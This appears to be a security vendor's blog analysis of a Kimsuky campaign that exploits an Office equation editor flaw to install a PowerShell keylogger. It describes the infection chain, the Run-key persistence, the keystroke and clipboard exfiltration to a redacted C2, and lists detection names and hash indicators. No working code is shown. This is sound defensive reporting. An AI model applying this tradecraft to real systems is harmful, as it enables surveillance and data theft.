Keylogger Exploits MS Office Equation Editor Vulnerability (Kimsuky)

AhnLab SEcurity intelligence Center (ASEC) has identified the details of the Kimsuky threat group recently exploiting a vulnerability (CVE-2017-11882) in the equation editor included in MS Office (EQNEDT32.EXE) to distribute a keylogger. The threat actor distributed the keylogger by exploiting the vulnerability to run a page with an embedded malicious script with the mshta process.

Figure 1. mshta.exe executed via the equation editor program (EQNEDT32.exe)
Figure 2. The C2 server screen (mshta.exe)

The page that mshta connects to is http://xxxxxxxxxxx.xxxxxx.xxxxxxxx.com/images/png/error.php and uses the file name error.php. As shown in Figure 2, the “Not Found” message makes it seem to the user as if a connection is not being established, but the malicious script is being run.

Figure 3. Content of the malicious script (error.php)

Figure 3 shows the content of error.php. Major behaviors include downloading an additional malware strain from the C2 (Query=50) via a PowerShell command, creating a file named desktop.ini.bak under the UsersPublicPictures path, and registering the desktop.ini.bak file in the Run key under HKLM with the name “Clear Web History” to allow it to run again. While an additional malware was downloaded and executed via PowerShell, the attacker’s erroneous coding in the part where wscript is run resulted in the failure to register to the Run key and create the file. When editing the script for replication purposes and having it run as intended, the desktop.ini.bak file is created and correctly registers itself to the registry key as shown in Figure 4.

Figure 4. Registration to the autorun registry
Figure 5. Content of the malicious script (50.php)

The first downloaded malware is a PowerShell script shown in Figure 5. It collects system and IP information and sends them to the C2 (Query=97). In addition, it can download and execute a keylogger from the C2 (Query=107).

Figure 6. Content of the malicious script (107.php)
Figure 7. Keylogging data content (desktop.ini.bak)

Figure 6 shows the script of the main part of the keylogger. The script creates the file desktop.ini.bak in the UsersPublicMusic path, which is for recording users’ keylogging data as well as clipboard data. It uses a mutex value “GlobalAlreadyRunning19122345” to prevent duplicate instances. The collected data is sent at random times within the time range set by the threat actor to the C2 (Query=97), deleted, and created again. The overall process execution is shown in the Procmon process tree.

Figure 8. The Procmon process tree

The Kimsuky group still exploits the vulnerability (CVE-2017-11882) in the MS Office equation editor (EQNEDT32.EXE) it frequently used before in order to increase the success rate of attacks. It is important to patch vulnerabilities to prevent malware infection from old vulnerabilities. Software must always be updated to the latest version and users should refrain from using software that has reached the end of service (EOS). Also, users must not open suspicious document files and update V3 to the latest version to prevent malware infection in advance. In addition to endpoint security products (V3), sandbox-based APT solutions such as MDS must be implemented to prevent harm from cyberattacks.

[File Detection]

  • Trojan/VBS.Agent.SC198696 (2024.03.29.00)
  • Downloader/PowerShell.Agent.SC197158 (2024.02.26.03)
  • Keylogger/PowerShell.Agent.SC197159 (2024.02.26.03)

[IOC] 

MD5s

  • 279c86f3796d14d2a4d89049c2b3fa2d
  • 5bfeef520eb1e62ea2ef313bb979aeae
  • d404ab9c8722fc97cceb95f258a2e70d

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Keylogger Installed Using MS Office Equation Editor Vulnerability (Kimsuky) appeared first on ASEC BLOG.